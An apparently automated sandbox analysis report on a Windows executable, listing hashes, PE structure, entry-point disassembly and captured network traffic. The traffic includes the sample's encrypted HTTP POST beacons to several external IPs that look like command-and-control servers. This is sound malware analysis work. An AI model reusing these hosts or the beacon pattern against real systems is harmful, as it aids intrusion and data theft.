                                                                                                                                                SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
                                                                                                                                                SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                                                                                                                                                SHA512:3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                                                                                                                                                SSDEEP:768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:00828e8e8686b000

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x409ee0
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:4cfe8bbfb0ca5b84bbad08b043ea0c87

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push esi
                                                                                                                                                push 0040C1F0h
                                                                                                                                                push 3966646Ch
                                                                                                                                                push 00000009h
                                                                                                                                                mov ecx, D22E2014h
                                                                                                                                                call 00007FB6C8A792FEh
                                                                                                                                                mov edx, 004011F0h
                                                                                                                                                mov ecx, eax
                                                                                                                                                call 00007FB6C8A79222h
                                                                                                                                                add esp, 0Ch
                                                                                                                                                mov ecx, 8F7EE672h
                                                                                                                                                push 0040C0D0h
                                                                                                                                                push 6677A1D2h
                                                                                                                                                push 00000048h
                                                                                                                                                call 00007FB6C8A792D9h
                                                                                                                                                mov edx, 004010D0h
                                                                                                                                                mov ecx, eax
                                                                                                                                                call 00007FB6C8A791FDh
                                                                                                                                                add esp, 0Ch
                                                                                                                                                push 08000000h
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1A8h]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [0040C10Ch]
                                                                                                                                                mov esi, eax
                                                                                                                                                test esi, esi
                                                                                                                                                je 00007FB6C8A81638h
                                                                                                                                                push 08000000h
                                                                                                                                                push 00000000h
                                                                                                                                                push esi
                                                                                                                                                call dword ptr [0040C1F8h]
                                                                                                                                                add esp, 0Ch
                                                                                                                                                push esi
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1A8h]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [0040C1E8h]
                                                                                                                                                call 00007FB6C8A78C5Ah
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1ACh]
                                                                                                                                                pop esi
                                                                                                                                                ret
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                sub esp, 0Ch
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                mov edi, edx
                                                                                                                                                mov dword ptr [ebp-0Ch], ecx
                                                                                                                                                mov esi, 00000001h
                                                                                                                                                mov dword ptr [ebp-08h], esi
                                                                                                                                                mov eax, dword ptr [edi]
                                                                                                                                                cmp eax, 7Fh
                                                                                                                                                jbe 00007FB6C8A81621h
                                                                                                                                                lea ecx, dword ptr [ecx+00h]
                                                                                                                                                shr eax, 07h
                                                                                                                                                inc esi
                                                                                                                                                cmp eax, 7Fh

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [LNK] VS2013 UPD4 build 31101
                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbad00x28.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd0000x5cc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb0000x8.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x98830x9a00False0.503297483766data6.45508103349IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0xb0000xb2e0xc00False0.160807291667data4.23495809712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0xc0000xbd80x200False0.123046875data0.91267432928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xd0000x5cc0x600False0.8671875data6.49434732961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllWTSGetActiveConsoleSessionId

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Mar 28, 2021 19:28:34.114087105 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.165966988 CEST4434971479.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:34.166119099 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.166656017 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.216830969 CEST4434971479.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:34.217293024 CEST4434971479.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:34.217324972 CEST4434971479.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:34.217418909 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.217493057 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.217690945 CEST49714443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:28:34.267751932 CEST4434971479.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:04.595930099 CEST497238080192.168.2.3193.169.54.12
                                                                                                                                                Mar 28, 2021 19:29:07.610238075 CEST497238080192.168.2.3193.169.54.12
                                                                                                                                                Mar 28, 2021 19:29:13.610925913 CEST497238080192.168.2.3193.169.54.12
                                                                                                                                                Mar 28, 2021 19:29:56.608781099 CEST497408080192.168.2.3173.230.145.224
                                                                                                                                                Mar 28, 2021 19:29:59.614701986 CEST497408080192.168.2.3173.230.145.224
                                                                                                                                                Mar 28, 2021 19:30:05.630954981 CEST497408080192.168.2.3173.230.145.224
                                                                                                                                                Mar 28, 2021 19:30:48.616257906 CEST497427080192.168.2.380.86.91.232
                                                                                                                                                Mar 28, 2021 19:30:51.619028091 CEST497427080192.168.2.380.86.91.232
                                                                                                                                                Mar 28, 2021 19:30:57.635288000 CEST497427080192.168.2.380.86.91.232
                                                                                                                                                Mar 28, 2021 19:31:40.594516993 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:40.733971119 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:40.734286070 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:40.734666109 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:40.870228052 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:40.871704102 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:40.872344017 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.008006096 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.008230925 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.051729918 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.185789108 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.185997963 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.215491056 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.349487066 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351247072 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351313114 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351339102 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351505041 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.351556063 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.390100002 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.523880959 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.524255991 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:45.875976086 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:45.879574060 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:32:11.552259922 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:32:14.013886929 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:32:14.151556969 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:32:14.559962988 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:32:20.560616970 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:33:03.570384979 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:06.564440012 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:12.580454111 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:55.599368095 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:33:58.599905968 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:34:04.631618977 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:34:47.565572023 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:47.617352962 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:34:48.119754076 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:48.171474934 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:34:48.682180882 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:48.734905958 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:19.602813005 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:19.728919983 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:20.231676102 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:20.355973005 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:20.856774092 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:20.980758905 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.594883919 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.645339012 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.645508051 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.646342993 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.695760012 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695818901 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695851088 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695969105 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.696018934 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.696080923 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.745516062 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.640903950 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.691565990 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.691874981 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.692884922 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.743468046 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743844032 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743882895 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743963003 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.744012117 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.744163990 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.794647932 CEST4434975879.172.249.82192.168.2.3

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Mar 28, 2021 19:28:18.333209038 CEST53609858.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:18.462861061 CEST5020053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:18.508667946 CEST53502008.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:18.626938105 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:18.685630083 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:19.557064056 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:19.609466076 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:20.290985107 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:20.338303089 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:21.135827065 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:21.185026884 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:22.727469921 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:22.782175064 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:23.964756966 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:24.010827065 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:24.862818003 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:24.911747932 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:25.844981909 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:25.892362118 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:26.786560059 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:26.841259956 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:28.269788980 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:28.318188906 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:29.612639904 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:29.658624887 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:30.569458961 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:30.619528055 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:31.719748974 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:31.774131060 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:32.839832067 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:32.889002085 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:34.184566975 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:34.241823912 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:35.410376072 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:35.460668087 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:36.903141022 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:36.949198008 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:53.642086983 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:53.692389011 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:28:57.679600000 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:28:57.736397982 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:10.612979889 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:10.658950090 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:12.662720919 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:12.720038891 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:14.618266106 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:14.647034883 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:14.664524078 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:14.703329086 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:16.438498974 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:16.487359047 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:20.343095064 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:20.399331093 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:35.178041935 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:35.224004030 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:35.344281912 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:35.390376091 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:35.864279985 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:35.910414934 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:52.124835968 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:52.171070099 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:29:52.574883938 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:29:52.639698029 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:30:19.032155037 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:30:19.079108000 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:14.622618914 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:14.693159103 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:15.599318981 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:15.655026913 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:16.169764042 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:16.232649088 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:19.112665892 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:19.184412003 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:22.363785982 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:22.428502083 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:33:22.714662075 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:33:22.769213915 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:20.993236065 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                Mar 28, 2021 19:35:21.041680098 CEST53521238.8.8.8192.168.2.3

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Mar 28, 2021 19:29:35.224004030 CEST8.8.8.8192.168.2.30x89e8No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Mar 28, 2021 19:33:14.693159103 CEST8.8.8.8192.168.2.30x7b3fNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 79.172.249.82:443
                                                                                                                                                • 167.114.153.153
                                                                                                                                                • 178.62.39.238:443

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.34971479.172.249.82443C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Mar 28, 2021 19:28:34.166656017 CEST240OUTPOST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 79.172.249.82:443
                                                                                                                                                Content-Length: 420
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 64 15 bd 9f bb 28 80 55 87 52 c0 ff d4 3c f7 e5 97 ae be b6 09 51 9c 77 77 ed 38 f6 d4 fe 22 da bb 96 3d 22 9d 57 37 0a 2f d4 3a 4d 6b 8b 5e e0 6c 13 21 be eb fe 2e c7 be ec 03 1d bc ba 6d 46 62 22 26 ae ef 33 53 6e 58 83 77 67 d9 64 ba 64 88 59 af 59 02 7d 74 2b 4f 12 54 7d c3 73 ae 77 98 e8 12 cd bc 7c 26 a1 ad a4 b2 5d fa 3f fc 1f 4a 1d 22 61 4c 5b cc 04 e6 69 91 ce f5 53 a1 08 f5 f8 bc 9c 11 8b 02 ef 02 0d 69 d6 83 69 6d b2 b6 6b 01 b7 a6 74 f0 e0 b0 2a 10 ff 0c 33 d8 ec fb e2 2f 41 a9 d7 c9 61 16 c2 64 d0 76 b6 85 3a a5 2a 13 55 ca 95 8c e9 03 76 00 7c 40 1e a0 57 9d cc 90 e4 92 fd 48 9f 73 94 06 15 63 bb bf df bf 84 bf a8 12 14 da e2 86 1c 57 30 23 29 02 c2 e7 7e 55 1f cc f0 91 f2 bf 93 4f c1 c2 00 7b ba d6 83 59 eb 5c 03 2c f7 43 b1 d8 30 1f 51 d4 42 64 da d9 73 fc e3 01 28 4c ea bf a3 f3 c0 af 9a eb e8 9c 98 57 6e f9 ac 4e ed 8f aa b7 96 37 2f 0a 4e 7d 2d 5d e6 3a 3f 1c 7b d4 fc 5e c2 d5 91 15 20 57 66 34 99 68 d0 15 6a 85 f0 dc d7 0c 4c 83 9f 3e 5a eb bb 0c b9 20 7c eb 42 75 73 76 c2 d2 0d 52 62 d0 55 85 9c 0a 89 eb 51 79 a9 07 0d bb 82 6f ef 51 8c 02 d5 8a e3 e5 23 63 d4 6a be ef f1 2f aa 4b be 00 45 b6 df 03 4a d2 b5 f4 c7 e5 41 97 66 94 3e af 67 6c 5a c1 b9 ab 2d 3d 4e 8e 85 c4 e9 89 63 4a 4a 3e aa 04 52 c8 1d 6b dc fd 7b 0b 9d
                                                                                                                                                Data Ascii: d(UR<Qww8"="W7/:Mk^l!.mFb"&3SnXwgddYY}t+OT}sw|&]?J"aL[iSiimkt*3/Aadv:*Uv|@WHscW0#)~UO{Y\,C0QBds(LWnN7/N}-]:?{^ Wf4hjL>Z |BusvRbUQyoQ#cj/KEJAf>glZ-=NcJJ>Rk{
                                                                                                                                                Mar 28, 2021 19:28:34.217293024 CEST240INHTTP/1.1 400 Bad Request
                                                                                                                                                Date: Sun, 28 Mar 2021 17:28:34 GMT
                                                                                                                                                Server: Apache/2.4.25 (Debian)
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
